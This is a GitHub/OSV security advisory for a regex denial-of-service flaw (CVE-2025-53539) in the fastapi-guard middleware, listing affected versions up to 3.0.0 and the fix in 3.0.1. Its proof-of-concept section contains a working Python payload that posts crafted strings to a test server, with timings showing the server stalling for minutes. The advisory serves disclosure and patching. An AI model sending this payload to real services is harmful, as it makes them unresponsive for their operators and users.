GHSA-j47q-rc62-w448

Source

https://github.com/advisories/GHSA-j47q-rc62-w448

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j47q-rc62-w448/GHSA-j47q-rc62-w448.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-j47q-rc62-w448

Aliases

CVE-2025-53539

Published

2025-07-07T23:36:39Z

Modified

2025-07-08T00:12:15.375525Z

Severity

0.0 (None) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N CVSS Calculator
6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N CVSS Calculator

Summary

fastapi-guard is vulnerable to ReDoS through inefficient regex

Details

Summary

fastapi-guard detects penetration attempts by using regex patterns to scan incoming requests. However, some of the regex patterns used in detection are extremely inefficient and can cause polynomial complexity backtracks when handling specially crafted inputs.

It is not as severe as exponential complexity ReDoS, but still downgrades performance and allows DoS exploits. An attacker can trigger high cpu usage and make a service unresponsive for hours by sending a single request in size of KBs.

PoC

e.g. https://github.com/rennf93/fastapi-guard/blob/1e6c2873bfc7866adcbe5fc4da72f2d79ea552e7/guard/handlers/suspatterns_handler.py#L31C79-L32C7

payload = lambda n: '<'*n+ ' '*n+ 'style=' + '"'*n + ' '*n+ 'url('*n # complexity: O(n^5)

print(requests.post("http://172.24.1.3:8000/", data=payload(50)).elapsed) # 0:00:03.771120
print(requests.post("http://172.24.1.3:8000/", data=payload(100)).elapsed) # 0:01:17.952637
print(requests.post("http://172.24.1.3:8000/", data=payload(200)).elapsed) # timeout (>15min)

Single-threaded uvicorn workers can not handle any other concurrent requests during the elapsed time.

Impact

Penetration detection is enabled by default. Services that use fastapi-guard middleware without explicitly setting enable_penetration_detection=False are vulnerable to DoS.

Database specific

{
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-1333"
    ],
    "nvd_published_at": "2025-07-07T20:15:28Z",
    "github_reviewed_at": "2025-07-07T23:36:39Z",
    "severity": "MODERATE"
}

References

Affected packages

PyPI / fastapi-guard

Package

Name: fastapi-guard; View open source insights on deps.dev
Purl: pkg:pypi/fastapi-guard

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

3.0.1

Affected versions

0.*

0.1.0

0.2.0

0.3.2

0.3.3

0.3.4

0.4.0

1.*

1.0.0

1.1.0

1.2.0

1.2.1

1.2.2

1.3.2

1.4.0

1.5.0

2.*

2.0.0

2.0.1

2.1.0

2.1.1

2.1.2

2.1.3

3.*

3.0.0

Database specific

{
    "last_known_affected_version_range": "<= 3.0.0"
}